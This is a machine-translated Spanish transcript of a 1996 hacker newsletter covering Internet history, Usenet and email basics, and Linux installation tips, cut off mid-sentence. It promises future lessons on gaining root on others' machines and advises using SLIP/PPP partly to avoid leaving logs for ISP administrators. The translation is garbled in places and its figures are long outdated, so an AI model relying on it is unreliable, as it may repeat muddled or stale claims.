2-Hackear for Dummies

download 2-Hackear for Dummies

of 34

description

libro del hacker antiguo pero bueno para leer

Transcript of 2-Hackear for Dummies

Hackear for DummiesContenido del Volumen 2:Internet for DummiesLinux!Introduccin a TCP / IPPuerto Surf!____________________________________________________________GUA PARA (casi) Inofensivo HACKINGVol.2 Nmero 1Internet for Dummies - omitir esto si usted es un asistente de Unix.Pero si usted lee en Obtendr algunas instrucciones de hacking ms kewl.____________________________________________________________Los seis Guas de (casi) Inofensivo hacking del Vol.1 saltaron inmediatamente en cmo hacer trucos de hacking.Pero si usted es como yo, todos esos detalles de sondear los puertos y jugando con hiptesis y hacer ping a los hosts se pone un poco de vrtigo.As que qu hay de la captura de la respiracin, de pie atrs y revisar qu diablos es lo que estamos jugando con?Una vez que tengamos los fundamentos bajo control, podemos pasar a la piratera en serio.Adems, he estado luchando con mi conciencia sobre la posibilidad de comenzar a darle paso a paso las instrucciones sobre cmo obtener acceso root a los ordenadores de otras personas.El pequeo ngel en mis susurros hombro derecho, "Ganando la raz sin permiso en las computadoras de otras personas no es agradable.As que no se lo digas a la gente cmo hacerlo. "El pequeo diablo en mi hombro izquierdo, dice," Carolyn, todos estos hackers piensan que no sabes nada!Proove a ellos ustedes saben cmo romper! "El pequeo ngel dice:" Si alguno Gua de lectura para (casi) Inofensivo hacking ensaya este truco, usted podra tener problemas con la ley por conspiracin para daar computadoras de otras personas "La. pequeo diablo dice: "Pero, Carolyn, decirle a la gente cmo romper en la raz y que se cree que es KEWL!"As que aqu es el trato.En este y en los prximos nmeros de la Gua a (casi) Inofensivo hacking te dir varias maneras de iniciar sesin como superusuario en la cuenta de la raz de algunos equipos host de Internet.Pero las instrucciones que dejarn una o dos cosas a la imaginacin.Mi teora es que si usted est dispuesto a vadear a travs de todo esto, es probable que no es uno de esos aspirantes a hackers emociones baratas que utilizaran este conocimiento para hacer algo destructivo que podra terminar en la crcel.*****************************Sugerencia tcnica: Si usted desea convertirse en un * * seria hacker, que necesitar Linux (una variedad freeware de Unix) en su PC.Una razn es que entonces se puede romper en la raz legalmente todo lo que quieras - en su propia computadora.Se golpes seguros que luchan en todo en la computadora de otra persona, slo para descubrir que lo que usted pensaba que era la raz fue una trampa hbilmente y el administrador del sistema y la risa del FBI en todo el camino a la crcel.Linux puede ser instalado en un PC con tan slo una CPU 386, a slo 2 Mb RAM y tan slo 20 MB de disco duro.Usted tendr que volver a formatear el disco duro.Mientras que algunas personas se han instalado con xito Linux sin destrozar sus cosas DOS / Windows, no cuente en salirse con la suya.Copia de seguridad, copia de seguridad, copia de seguridad!**********************************************************Usted puede ir a la crcel advertencia: Crack en la raz en el ordenador de otra persona y la crcel se convierte en una clara posibilidad.Piense en esto: cuando ves una noticia sobre algn hacker ser pillado, con qu frecuencia usted reconoce el nombre?Con qu frecuencia es el ltimo busto est haciendo para alguien famoso, como oscuro Tangente o Se7en o Emmanuel Goldstein?Qu tal, como, nunca!Eso es porque realmente buenos hackers encontrar la manera de no hacer cosas estpidas.Aprenden a agrietarse en las computadoras para el desafo intelectual y de averiguar cmo hacer que las computadoras a salvo de intrusos.Lo hacen no bull su camino en la raz y hacer un lo de cosas, que tiende a inspirar a los administradores de sistemas a llamar a la polica.*********************************Aviso Emocionante: Es demasiado aburrido para simplemente cortar en su propia mquina Linux?Colgar en l.Ira Winkler de la Asociacin Nacional de Seguridad Informtica, Dean Garlick de la dinmica del espacio Lab de la Universidad Estatal de Utah y yo estamos trabajando en la creacin de hack.net, un lugar donde va a ser legal para entrar en los ordenadores.No slo eso, estamos buscando patrocinadores que darn premios en efectivo y becas a los que muestran las mayores habilidades de hacking.Ahora suena eso como ms phun que la crcel?*****************************Por lo tanto, vamos a saltar en nuestros fundamentos de hacking tutorial con una mirada a la anarqua maravilloso que es Internet.Tenga en cuenta que estas guas a (casi) Inofensivo hacking enfoque en Internet.Esto se debe a que hay muchas maneras legales para hackear en Internet.Adems, hay ms de 10 millones de estas computadoras fcilmente hackable en Internet, y el nmero crece cada da.Conceptos bsicos de InternetNadie es dueo de la Internet.Nadie lo ejecuta.Nunca fue planeado para ser lo que es hoy.Acaba de suceder, la consecuencia de un mutante 1969 Agencia de Proyectos de Investigacin Avanzada de Defensa de EE.UU. experimento.Este sistema anrquico permanece atado juntos porque sus usuarios obedecen voluntariamente algunas reglas bsicas.Estas reglas se pueden resumir en dos palabras: Unix y TCP / IP (con un guio a UUCP).Si usted entiende, realmente entender Unix y TCP / IP (y UUCP), que se convertir en un pez nadando en el mar del ciberespacio, un Uberhacker entre los aspirantes a hackers, un maestro del universo de Internet.Para obtener ayuda tcnica, Internet es una red distribuida en todo el mundo de la informtica / comunicaciones se mantienen unidos por un estndar de comunicaciones comn, / Protocolo de Internet Transmission Control Protocol (TCP / IP) y un poco de UUCP.Estas normas permiten que cualquiera pueda conectar un ordenador a Internet, que se convierte en otro nodo de esta red de Internet.Todo lo que se necesita es obtener una direccin de Internet asignada al nuevo equipo, que se conoce entonces como un Internet "anfitrin" y corbata en un enlace de comunicaciones de Internet.Estos enlaces estn disponibles en casi todas partes del mundo.Si utiliza un servicio en lnea de su ordenador personal, usted tambin puede convertirse temporalmente parte de la Internet.Hay dos formas principales para conectar a un servicio en lnea.Existe la conexin a la patata cybercouch que cada novato utiliza.Se requiere ya sea un punto a punto (PPP) o SLIPconnection, lo que le permite ejecutar fotos bonitas con el navegador web.Si tienes algn tipo de software empaquetado de su ISP, le da automticamente este tipo de conexin.O se puede conectar con un emulador de terminal a un host de Internet.Este programa puede ser algo tan simple como el programa de Windows 3.1 "Terminal" en el icono "Accesorios".Una vez que haya marcado y conectado slo eres otro terminal en este equipo anfitrin.No le dar cuadros bonitos.Esta conexin ser similar a lo que se obtiene en un anticuado BBS.Pero si usted sabe cmo utilizar este tipo de conexin, podra incluso darle acceso root a ese host.Pero, cmo est el equipo host utiliza conectado a Internet?Se va a correr un poco de variedad del sistema operativo Unix.Desde Unix es tan fcil de adaptarse a casi cualquier ordenador, esto significa que casi cualquier ordenador puede llegar a ser un host de Internet.Por ejemplo, a veces entro en Internet a travs de una serie que es un ordenador Silicon Graphics Indigo en la Universidad del Estado de Utah.Su direccin de Internet es fantasia.idec.sdl.usu.edu.Este es un equipo optimizado para el trabajo de la animacin por ordenador, pero tambin puede funcionar como un host de Internet.En otras ocasiones, el punto de entrada utilizado puede ser pegasus.unm.edu, que es un IBM RS 6000 Modelo 370. Se trata de un equipo optimizado para la investigacin en la Universidad de Nuevo Mxico.Cualquier ordenador que puede ejecutar el software necesario - que es bsicamente el sistema operativo Unix - tiene un mdem, y est vinculada a un enlace de comunicaciones por Internet, puede convertirse en un nodo de Internet.Incluso un PC puede convertirse en un servidor de Internet mediante la ejecucin de uno de los sabores de Linux de Unix.Despus de su puesta en marcha con Linux se puede acordar con el proveedor de Internet de su opcin de vincular de forma permanente a Internet.De hecho, muchos ISP utilizan nada ms que ordenadores conectados en red con Linux!Como resultado, toda la computacin, almacenamiento de datos y envo, recepcin y envo de mensajes a travs de Internet es manejada por los millones de ordenadores de muchos tipos y es propiedad de un sinnmero de empresas, instituciones educativas, entidades gubernamentales e incluso particulares.Cada uno de estos ordenadores tiene una direccin individual que le permite ser alcanzado a travs de la Internet, si conectado a un enlace de comunicaciones apropiado.Esta direccin puede ser representado de dos maneras: como un nombre o un nmero.Los enlaces de comunicaciones de Internet tambin son propiedad y mantenidos de la misma manera anrquica como los anfitriones.Cada propietario de un host de Internet es responsable de encontrar y pagar por un enlace de comunicaciones que har que ese host atada con al menos otro anfitrin.Enlaces de comunicaciones puede ser tan simple como una lnea telefnica, un enlace de datos inalmbrica, como paquetes de datos digitales celulares, o tan complicado como un enlace de fibra ptica de alta velocidad.Mientras el enlace de comunicaciones puede utilizar TCP / IP o UUCP, se puede encajar en el Internet.As, la red crece sin coordinacin general.Un nuevo propietario de un host de Internet slo tiene que conseguir el permiso para atar en un enlace de comunicaciones a otro anfitrin.Alternativamente, si el proveedor del enlace de comunicaciones decide Este ordenador, por ejemplo, un paraso para los spammers, se puede cortar este "sitio canalla" fuera de la Internet.El sitio de pcaro debe entonces snooker algn vnculo otras comunicaciones en atar en Internet de nuevo.La forma en la mayora de estos ordenadores interconectados y comunicaciones vincula el trabajo es a travs de la lengua comn del protocolo TCP / IP.Bsicamente, TCP / IP rompe cualquier comunicacin de Internet en discretos "paquetes".Cada paquete incluye informacin sobre la manera de derrotar a l, de correccin de errores, y las direcciones del remitente y el destinatario.La idea es que si se pierde un paquete, el remitente lo sabr y vuelva a enviar el paquete.Cada paquete se puso en marcha entonces en el Internet.Esta red puede elegir automticamente una ruta de nodo a nodo para cada paquete utilizando lo que est disponible en el momento, y vuelve a montar los paquetes en el mensaje completo en el equipo al que iba dirigida.Estos paquetes pueden seguir rutas tortuosas.Por ejemplo, un paquete puede ir desde un nodo en Boston a Amsterdam y de vuelta a los EE.UU. para el destino final en Houston, mientras que otro paquete del mismo mensaje puede ser enrutado a travs de Tokio y Atenas, y as sucesivamente.Por lo general, sin embargo, los enlaces de comunicaciones no son tan tortuosa.Enlaces de comunicacin pueden incluir la fibra ptica, lneas telefnicas y los satlites.La fuerza de esta red de conmutacin de paquetes es que la mayora de los mensajes obtendrn automticamente a travs de la congestin del trfico a pesar mensaje pesado y muchos enlaces de comunicaciones estn fuera de servicio.La desventaja es que los mensajes pueden simplemente desaparecer dentro del sistema.Tambin puede ser difcil llegar a los ordenadores deseados si los enlaces demasiadas comunicaciones no estn disponibles en el momento.Sin embargo, todas estas maravillosas caractersticas tambin son profundamente hackeable.El Internet es lo suficientemente robusto para sobrevivir - por lo que sus inventores afirman - incluso la guerra nuclear.Sin embargo, tambin es tan dbil que slo con un poco de instruccin, es posible aprender a suplantar seriamente el sistema (correo electrnico forjado) o incluso poner temporalmente fuera de servicio los equipos host de Internet de otras personas (ping de inundaciones, por ejemplo.)Por otra parte, las cabeceras de los paquetes que llevan los comandos de hacking regalar la informacin de la cuenta de la que un hacker est funcionando.Por esta razn, es difcil de ocultar perfectamente cuando en el Internet.Es esta tensin entre este poder y la robustez y la debilidad y el potencial de confusin que hace que Internet sea un parque infantil de piratera informtica.Por ejemplo, AQU EST SU CONSEJO PIRATAS que has estado esperando para este problema:ftp://ftp.secnet.comEste sitio ftp fue publicada en la lista BUGTRAQ, que se dedica a la discusin de los agujeros de seguridad de Unix.Moderador es Aleph One, que es un autntico Uberhacker.Si desea suscribirse a la BUGTRAQ, correo electrnico [email protected] con el mensaje "subscribe BUGTRAQ."Ahora, de vuelta a lo bsico de Internet.Historia del InternetComo se mencion anteriormente, el Internet naci como un esfuerzo de Estados Unidos Agencia de Proyectos de Investigacin Avanzada (ARPA) en 1969. Sus inventores llamaron ARPANET.Pero a causa de su valor en la investigacin cientfica, la Fundacin Nacional de Ciencia de Estados Unidos (NSF) se hizo cargo en 1983. Pero en los aos transcurridos desde entonces evolucion gradualmente lejos de cualquier fuente nica de control.En abril de 1995 la NSF cort los ltimos faldas.Ahora Internet est dirigido por nadie.Simplemente sucede y surge de los esfuerzos de aquellos que juegan con ella y la lucha con el software y el hardware.Nada de nada como esto nunca ha sucedido antes.Ahora tenemos un sistema informtico con una vida propia.Nosotros, como los piratas informticos, formamos una gran parte del motor de mutacin que mantiene el Internet en evolucin y cada vez ms fuerte.Tambin formamos una gran parte del sistema inmunolgico de esta extica criatura.La idea original de ARPANET fue disear una red informtica y de las comunicaciones que se convertira en lo redundante, tan robusto, y as poder operar sin control centralizado, que incluso podra sobrevivir una guerra nuclear.Lo que tambin pas es que ARPANET evolucion hasta convertirse en un ser que ha sobrevivido a la final de la financiacin del gobierno, sin siquiera un bache en su crecimiento.As pues, su descendencia anrquica, la Internet, ha tenido xito ms all de los sueos ms salvajes de sus arquitectos originales.El Internet ha crecido de manera explosiva, sin un final a la vista.En sus inicios como ARPANET se celebr slo 4 anfitriones.Un cuarto de siglo ms tarde, en 1984, contena slo 1000 anfitriones.Pero en los prximos 5 aos, este nmero creci diez veces a 10.000 (1989).Durante los 4 aos siguientes creci otra diez veces a 1.000.000 (1993).Dos aos ms tarde, a finales de 1995, se estima que la Internet para tener por lo menos 6 millones de equipos host.Probablemente hay ms de 10 millones en la actualidad.No parece haber ningn final a la vista an por el increble crecimiento de este nio mutante de ARPANET.De hecho, una preocupacin planteada por el crecimiento exponencial de Internet es que la demanda eventualmente puede ahora ganarle la carrera capacidad.Porque ahora hay una entidad posee o controla Internet, si la capacidad de los enlaces de comunicaciones entre nodos es demasiado pequeo, y se convirtiera en serio empantanado, podra ser difcil de solucionar el problema.Por ejemplo, en 1988, Robert Morris, Jr. desat un programa tipo "virus" en la Internet comnmente conocido como el "gusano de Morris." Este virus hara copias de s mismo en cualquier equipo que era y luego enviar copias de las comunicaciones enlaces a otros servidores de Internet.(Se utiliza un bug en sendmail que permita el acceso a la raz, lo que permite que el virus de actuar como superusuario).Rpidamente la propagacin exponencial de este virus hizo el colapso de Internet desde el espacio de trfico de comunicaciones y el disco es atado.A la hora de Internet todava estaba bajo cierta apariencia de control por parte de la Fundacin Nacional de Ciencia y estaba conectado a unos pocos miles de ordenadores.La Red fue cerrado y todos los virus de la purificacin de sus equipos host, y luego el neto fue puesto de nuevo en funcionamiento.Morris, por su parte, fue puesto en la crcel.Existe cierta preocupacin de que, a pesar de la mejora de las medidas de seguridad (por ejemplo, "firewalls"), alguien puede encontrar una nueva manera de lanzar un virus que podra nuevamente apagar el Internet.Dada la prdida de control centralizado, reiniciando podra ser mucho ms tiempo si esto llegara a suceder de nuevo.Pero el restablecimiento de un control centralizado hoy como la que exista en el momento de la "Gusano Morris" es probable que sea imposible.Incluso si fuera posible, los arquitectos de ARPANET originales eran probablemente correctos en su evaluacin de que la Red podra ser ms susceptibles de falla masiva en lugar de menos si algn control centralizado se encontraban en el lugar.Quizs la caracterstica ms significativa nica de la Internet de hoy es esta falta de control centralizado.Ninguna persona u organizacin ahora es capaz de controlar la Internet.De hecho, la dificultad del control se convirti en un problema tan pronto como su primer ao de funcionamiento como ARPANET.En ese ao de correo electrnico fue inventado espontneamente por sus usuarios.Para sorpresa de los directivos de ARPANET, por el segundo ao de correo electrnico representaron el grueso de la comunicacin a travs del sistema.Debido a que Internet haba crecido hasta tener una vida totalmente autnoma, descentralizada propia, en abril de 1995, la NSF dej NSFNET financiacin, la columna vertebral de las comunicaciones de fibra ptica que en un tiempo haba dado NSF la tecnologa para controlar el sistema.La proliferacin de enlaces de comunicaciones paralelas y anfitriones tenido para entonces omite por completo cualquier posibilidad de control centralizado.Hay varias caractersticas importantes de Internet:* World Wide Web - una red editorial hipertexto y ahora la parte de ms rpido crecimiento de la Internet.* Correo electrnico - una forma de enviar mensajes electrnicos* Usenet - foros en los que los usuarios pueden publicar y ver los mensajes pblicos* Telnet - una forma de la cuenta para los ordenadores remotos de Internet* Protocolo de transferencia de archivos - una forma de descargar archivos desde equipos remotos de Internet* Internet Relay Chat - conversaciones de texto en tiempo real - utilizado principalmente por los hackers y otros de Internet veteranos* Gopher - una forma de catalogacin y bsqueda de informacin.Esto est creciendo rpidamente obsoletos.A medida que los surfistas portuarias saben, hay docenas de otros servicios interesantes pero menos conocidas como whois, dedo, mesa de ping etc.La red mundialLa World Wide Web es la principal caracterstica ms reciente de Internet, que data de la primavera de 1992. Se compone de "pginas web", que son como las pginas de un libro, y enlaces desde especialmente marcados palabras, frases o smbolos en cada pgina a otras pginas Web.Estas pginas y enlaces juntos crean lo que se conoce como "hipertexto".Esta tcnica permite atar juntos muchos documentos diferentes que se podrn escribir por muchas personas y se almacenan en muchos equipos diferentes de todo el mundo en un documento hipertexto.Esta tcnica se basa en el estndar Universal Resource Locator (URL), que especifica cmo conectar con el ordenador y acceder a los archivos en su interior, donde se pueden almacenar los datos de una pgina Web.Un URL es siempre de la forma http: // , donde incluye un nombre de dominio que debe ser registrado en una organizacin llamada InterNIC para hacer que las dos pginas web diferentes (o direcciones de correo electrnico seguro , o direcciones de computadora) no terminan siendo idntica.Este registro es una de las pocas caractersticas de control centralizados de Internet.He aqu cmo funciona el hipertexto de la World Wide Web.El lector podra llegar a una declaracin como "nuestra empresa ofrece el servicio de camiones LTL a todas las principales ciudades de Estados Unidos."Si se pone de relieve esta declaracin en la pgina "web", que significa que un clic de ratn de la computadora del lector que l o ella se llevar a una nueva pgina web con los detalles.Estos pueden incluir horarios completos y un formulario para llenar para solicitar una recogida y entrega.Algunas pginas Web incluso ofrecen maneras de hacer pagos electrnicos, por lo general a travs de tarjetas de crdito.Sin embargo, la seguridad de las transferencias de dinero a travs de Internet sigue siendo un problema importante.Sin embargo, pese a las preocupaciones con la verificabilidad de las transacciones financieras, el comercio electrnico a travs de Internet est creciendo rpidamente.En su segundo ao de existencia, 1994, slo algunos $ 17,6 millones en las ventas se realizaron a travs de Internet.Pero en 1995, las ventas alcanzaron los $ 400 millones.Hoy, en 1996, la web se ha atascado con sitios comerciales que piden informacin de su tarjeta de crdito.Adems, la Web est siendo utilizado como una herramienta en la distribucin de una nueva forma de moneda, conocido como dinero electrnico.Es concebible que, si el obstculo de la verificabilidad se puede superar, que el dinero electrnico (a menudo llamado ecash) puede jugar un papel importante en la economa mundial, lo que simplifica el comercio internacional.Tambin puede llegar a hacer que las monedas nacionales e incluso los impuestos tal como lo conocemos obsoleto.Ejemplos de sitios web donde se puede obtener ecash incluyen Mark Twain Banco de St. Louis, MO (http://www.marktwain.com) y Digicash de Amsterdam, Pases Bajos (http://www.digicash.com).La naturaleza casi fuera de control de Internet se manifiesta en la World Wide Web.El autor de una pgina web no tiene que pedir permiso o hacer cualquier arreglo con los autores de otras pginas web a las que l o ella desea establecer vnculos.Los enlaces pueden ser establecidos de forma automtica simplemente con la programacin en las URL de los enlaces de la pgina Web que desee.Por el contrario, la nica forma en que el autor de una pgina web puede evitar que otras personas de su lectura o el establecimiento de enlaces de hipertexto a ello es la creacin de un sistema de proteccin de contrasea (o por no contar con enlaces de comunicaciones con el resto de la Internet).Un problema con la World Wide Web es cmo encontrar cosas en l.Del mismo modo que cualquier persona puede conectar un ordenador nuevo al Internet, por lo que tambin existe una autoridad central con control o incluso el conocimiento de lo que se publica en la World Wide Web.Nadie tiene que pedir permiso de una autoridad central para poner una pgina Web.Una vez que el usuario conoce la direccin (URL) de una pgina web, o por lo menos la URL de una pgina Web que une finalmente a la pgina deseada, entonces es posible (siempre que los enlaces de comunicaciones estn disponibles) para casi instantneamente conectar con esta pgina.Debido al valor de conocer las direcciones URL, ahora hay muchas empresas e instituciones acadmicas que ofrecen ndices de bsqueda (ubicados en la Web) en la World Wide Web.Programas automatizados como rastreadores Web buscar en la Web y catalogar las direcciones URL que se encuentran en su viaje desde el enlace de hipertexto a enlace de hipertexto.Pero debido a que la web est en constante crecimiento y cambio, no hay manera de crear un catlogo exhaustivo de toda la Web.EmailEl correo electrnico es el uso segunda ms antigua de la Internet, que se remonta a la ARPAnet de 1972. (El primer uso fue permitir que las personas se conecten de forma remota en que su eleccin de uno de los cuatro equipos en los que ARPANET fue lanzado en 1971.)Hay dos usos principales de correo electrnico: comunicaciones privadas, y el correo electrnico transmitido.Cuando transmitido, correo electrnico sirve para hacer anuncios (radiodifusin unidireccional), y para continuar las discusiones entre grupos de personas, como nuestra lista Happy Hacker.En el modo de grupo de discusin, cada mensaje enviado por todos los miembros de la lista se transmite a todos los otros miembros.Los dos tipos de programas ms utilizados para transmitir a los grupos de discusin de correo electrnico son mayordomo y servidor de listas.UsenetUsenet era una consecuencia natural de la lista de discusin de grupo de correo electrnico transmitido.Uno de los problemas con las listas de correo electrnico es que no haba manera fcil para la gente nueva a estos grupos a unirse a ellos.Otro problema es que a medida que el grupo crece, un miembro puede ser inundado con decenas o cientos de mensajes de correo electrnico cada da.En 1979 estos problemas fueron abordados por el lanzamiento de Usenet.Usenet se compone de grupos de usuarios que llevan en las discusiones en forma de "mensajes".A diferencia de un grupo de discusin por correo electrnico, estos mensajes se almacenan, por lo general durante dos semanas ms o menos, a la espera de los lectores potenciales.Como los nuevos mensajes se envan a un grupo de noticias, que se transmiten a todos los hosts de Internet que se ha suscrito a llevar a los grupos de usuarios a los que pertenecen estos puestos.Con muchos programas de conexin a Internet se puede ver las similitudes entre Usenet y correo electrnico.Ambos tienen encabezados similares, que hacen un seguimiento de su movimiento a travs de la Red.Algunos programas como el pino se envan para enviar el mismo mensaje simultneamente a ambas direcciones de correo electrnico y grupos de noticias.Todos los lectores de noticias de Usenet le permiten enviar por correo electrnico a los autores de los mensajes, y muchos tambin le permiten enviar por correo electrnico estos mensajes s a usted oa otras personas.Ahora, aqu es una visin general de los conceptos bsicos de Internet que planeamos cubrir en los prximos nmeros de gua para (casi) Inofensivo de Hacking:1. UnixDiscutimos "cscaras", que le permiten a uno escribir programas ("scripts") que automatizan serie complicada de comandos de Unix.El lector se introduce el concepto de secuencias de comandos que realizan funciones de hacking.Introducimos Perl, que es un lenguaje de programacin de shell utilizado para la mayora de la lite de los scripts de hacking como SATAN.3. TCP / IP y UUCPEste captulo trata de los enlaces de comunicaciones que unen a Internet desde la perspectiva de los piratas informticos.Se da especial atencin a UUCP ya que es tan hackeable.4. Direcciones de Internet, nombres de dominio y RoutersEl lector se entera de cmo se enva la informacin a los lugares correctos en Internet, y cmo los hackers puede hacer que se vaya a los lugares equivocados!Cmo buscar hosts UUCP (que no estn bajo el sistema de nombres de dominio) est incluido.5. Fundamentos de Elite de Hacking: Puertos, paquetes y los permisos de archivosEsta seccin permite que el genio de la piratera en serio fuera de la botella.Ofrece una serie de ejercicios en los que el lector puede disfrutar de acceso a casi cualquier host de Internet elegido al azar.De hecho, al final del captulo el lector habr tenido la oportunidad de practicar varias docenas de tcnicas para ganar la entrada a las computadoras de otras personas.Sin embargo, estos hacks que enseamos son 100% legal!_________________________________________________________Quiere suscribirse a esta lista?Email [email protected] con el mensaje "subscribe happyhacker." Quieres compartir algunos stuph kewl con la lista Happy Hacker?Enve sus mensajes a [email protected] enviarme correo electrnico confidencial (por favor, no hay discusin de actividades ilegales) utilizan [email protected] favor, llamas directas a dev/[email protected] feliz!Derechos reservados 1996 Carolyn P. Meinel.Usted puede enviar la GUA PARA (casi) Inofensivo HACKING, siempre y cuando salga de este aviso al final ..________________________________________________________________________________________________GUA PARA (casi) Inofensivo HACKINGVol.2 Nmero 2Linux!________________________________________Unix ha convertido en el sistema operativo primo de la Internet.De hecho, Unix es el sistema operativo ms utilizado en el mundo entre los equipos con ms poder que los PC.Es cierto que Windows NT est subiendo ms rpido que un sistema operativo comn de Internet, y es taaan maravillosamente buggy que parece que podra convertirse en el nmero uno favorito para romper en.Pero hoy Unix en todas sus maravillosos sabores todava es el sistema operativo para saber para ser un hacker de verdad lite.Hasta ahora hemos supuesto que usted ha estado hacking utilizando una cuenta shell que se obtiene a travs de su proveedor de servicios Internet (ISP).Una cuenta shell le permite dar comandos de Unix en una de las computadoras de su ISP.Pero usted no tiene que depender de su proveedor de Internet para una mquina que te permite jugar con Unix.Puede ejecutar Unix en su propio ordenador y con una conexin SLIP o PPP ser conectado directamente a Internet.***********************Newbie nota: Serial Line Internet Protocol (SLIP) y Point-to-Point Protocol (PPP) conexiones que dan una direccin de Protocolo de Internet temporal (IP) que le permite ser enganchado directamente a Internet.Tienes que utilizar SLIP o conexiones PPP para llegar a utilizar un navegador Web que le da imgenes en lugar de texto solamente.As que si usted puede ver las imgenes en la Web, ya tiene uno de estos disponibles para usted.La ventaja de utilizar una de estas conexiones directas para sus actividades de hacking es que no vas a dejar atrs un archivo de registro de la cscara de administrador de sistemas de su ISP para estudiar minuciosamente.Incluso si usted no est violando la ley, un archivo de registro de shell que le muestra haciendo un montn de stuph pirata informtico puede ser suficiente para algunos administradores de sistemas para cerrar sumariamente su cuenta.********************Cul es el mejor tipo de equipo para ejecutar Unix en?A menos que seas un hacker rico que piensa que nada de comprar una estacin de trabajo Sun SPARC, es probable que mejor sabe hacer con algn tipo de PC.Hay casi un sinnmero de variantes de Unix que se ejecutan en los ordenadores personales, y algunos para Macs.La mayor parte de ellos son gratuitos para descargar, o econmicamente disponible en CD-ROM.Las tres variantes ms comunes de Unix que se ejecutan en los ordenadores son de Sun Solaris, FreeBSD y Linux.Solaris cuesta alrededor de $ 700.Basta de charla.FreeBSD es muy, muy bueno.Pero cont encontrar muchos manuales o grupos de noticias que cubren FreeBSD.Linux, sin embargo, tiene la ventaja de estar disponible en muchas variantes (para que pueda divertirse mezclar y combinar los programas de las diferentes ofertas de Linux).Lo ms importante, Linux es apoyado por muchos manuales, grupos de noticias, listas de correo y sitios Web.Si usted tiene amigos de hackers en su rea, la mayora de ellos probablemente usar Linux y pueden ayudarte.*********************Nota histrica: Linux fue creado en 1991 por un grupo liderado por Linus Torvalds, de la Universidad de Helsinki.Linux tiene derechos de autor bajo la Licencia Pblica General de GNU.En virtud de este acuerdo, Linux puede ser redistribuido a cualquiera que junto con el cdigo fuente.Cualquier persona puede vender cualquier variante de Linux y modificarlo y volver a empaquetar.Pero incluso si alguien modifica el cdigo fuente que l o ella no puede reclamar derechos de autor para cualquier cosa creada a partir de Linux.Cualquier persona que vende una versin modificada de Linux debe proporcionar el cdigo fuente a los compradores y les permitir reutilizar en sus productos comerciales sin cobrar derechos de licencia.Esta disposicin se conoce como un "copyleft".En virtud de esta disposicin, los creadores originales de Linux no reciben licencias o shareware honorarios.Linus Torvalds y los muchos otros que han contribuido a Linux han hecho desde la alegra de programacin y un sentido de comunidad con todos los que se espera utilizar Linux en el espritu de buena piratera tipo.Viva Linux!Viva Torvalds!**********************Linux consiste en el propio sistema operativo (llamado el "kernel"), adems de un conjunto de programas asociados.El kernel, como todos los tipos de Unix, es un sistema operativo multitarea y multiusuario.A pesar de que utiliza una estructura de archivos diferente, y por lo tanto no es directamente compatible con DOS y Windows, es tan flexible que muchos programas DOS y Windows se pueden ejecutar mientras que en Linux.As que un usuario avanzado probablemente querr arrancar en Linux y luego ser capaz de ejecutar programas DOS y Windows desde Linux.Programas asociados que vienen con la mayora de las distribuciones de Linux pueden incluir:* Un programa de shell (Bourne Again Shell - BASH - es ms comn);* Compiladores para lenguajes de programacin como Fortran-77 (mi favorito!), C, C ++, Pascal, LISP, Modula-2, Ada, Bsico (el mejor lenguaje para un principiante), y Smalltalk .;*, Una interfaz grfica de usuario X (a veces llamado X-Windows)* Programas de utilidades como el pino lector de correo electrnico (mi favorito) y ElmLas diez principales razones para instalar Linux en su PC:1. Cuando Linux es ilegal, slo los proscritos ser el propietario de Linux.2. Cuando la instalacin de Linux, es muy divertido para ejecutar fdisk sin copias de seguridad de primera.3. Las llamas que obtiene de hacer preguntas sobre los grupos de noticias de Linux son de una calidad superior a las llamas que recibe para su publicacin en alt.sex.bestiality.4.No importa qu sabor de Linux se instala, se dar cuenta maana haba una ersin mucho ms 3l1te usted debe haber tenido lugar.5.People que usan BSD gratis o Solaris no se burlan de ti.Ofrecern su simpata en su lugar.6.At la prxima Def Con podrs decir stuph como "as entonces su-ed a su cuenta y grepped todos sus archivos de 'kissyface'."Vaya, grepping archivos de otras personas es un no-no, olvidar que alguna vez suger.Resaca 7.Port en la intimidad.8.One palabra: exploits.9.Installing Linux en su PC de la oficina es como ser un empleado de correos y llevar una Uzi funcione.10.But - - si instala Linux en su computadora de la oficina, que ser el jefe no tiene ni idea de lo que eso significa.Qu tipos de Linux funcionan mejor?Depende de lo que realmente quieres.Redhat Linux es famoso por ser el ms fcil de instalar.El conjunto 3.0 CD-ROM Walnut Creek Linux tambin es muy fcil de instalar - para Linux, que es!Mi enfoque ha sido el de conseguir un montn de versiones de Linux y mezclar y combinar lo mejor de cada distribucin.Me gusta la versin de Walnut Creek mejor porque con mi marca X hardware, su caracterstica de deteccin automtica era un salvavidas.Instalacin de Linux no es para los dbiles de corazn!Varios consejos para sobrevivir a la instalacin son:1) A pesar de que en teora puede ejecutar Linux en un 286 con 4 MB de RAM y dos unidades de disquete, es * mucho * ms fciles con un 486 o superior con 8 MB de RAM, un CD-ROM, y por lo menos 200 MB de disco duro libre espacio.2) Conocer tanto como sea posible acerca de qu tipo de placa madre, mdem, disco duro, CD-ROM y tarjeta de vdeo que tenga.Si usted tiene alguna documentacin para ellos, ellos tienen a la mano para hacer referencia durante la instalacin.3) Se trabaja mejor utilizar hardware que es el nombre de la marca y un poco fuera de fecha en su computadora.Debido a que Linux es un programa gratuito, que no ofrece controladores de dispositivo para todo el hardware ms reciente.Y si su hardware es como el mo - un montn de la marca X y El Cheapo stuph, puede tomar mucho tiempo experimentando con lo que los conductores trabajarn.4) Antes de comenzar la instalacin, haga una copia de seguridad del disco duro (s)!En teora se puede instalar Linux sin daar sus archivos DOS / Windows.Pero todos somos humanos, especialmente si siguiendo los consejos del punto 7).5) Obtener ms de una distribucin de Linux.La primera vez que he instalado con xito Linux, finalmente ha golpeado en algo que trabaj con el disco de arranque de una distribucin con el CD-ROM para otro.En cualquier caso, cada distribucin de Linux tiene diferentes programas de utilidades, emuladores de sistemas operativos, compiladores y ms.Aadir a todos a su sistema y se le configura para convertirse ms all de lite.6) Comprar un libro o dos o tres en Linux.No me gusta ninguno de ellos!Pero son mejor que nada.La mayora de los libros sobre Linux vienen con uno o dos CD-ROM que se pueden utilizar para instalar Linux.Pero me di cuenta que lo que estaba en los libros no coincide exactamente con lo que haba en los CD-ROM.7) Te recomiendo beber durante la instalacin.No puede hacer la depuracin ir ms rpido, pero al menos no le importa lo difcil que es.Ahora casi puedo garantizar que, incluso despus de todos estos 6 consejos, usted todava tiene problemas con la instalacin de Linux.Oh, tengo 7 avisos ah arriba?Olvdese nmero 7. Pero confiad.Dado que todos los dems tambin sufre poderosamente durante la instalacin y el uso de Linux, el Internet tiene una increble cantidad de recursos para el Linux -challenged.Si usted es alrgico a 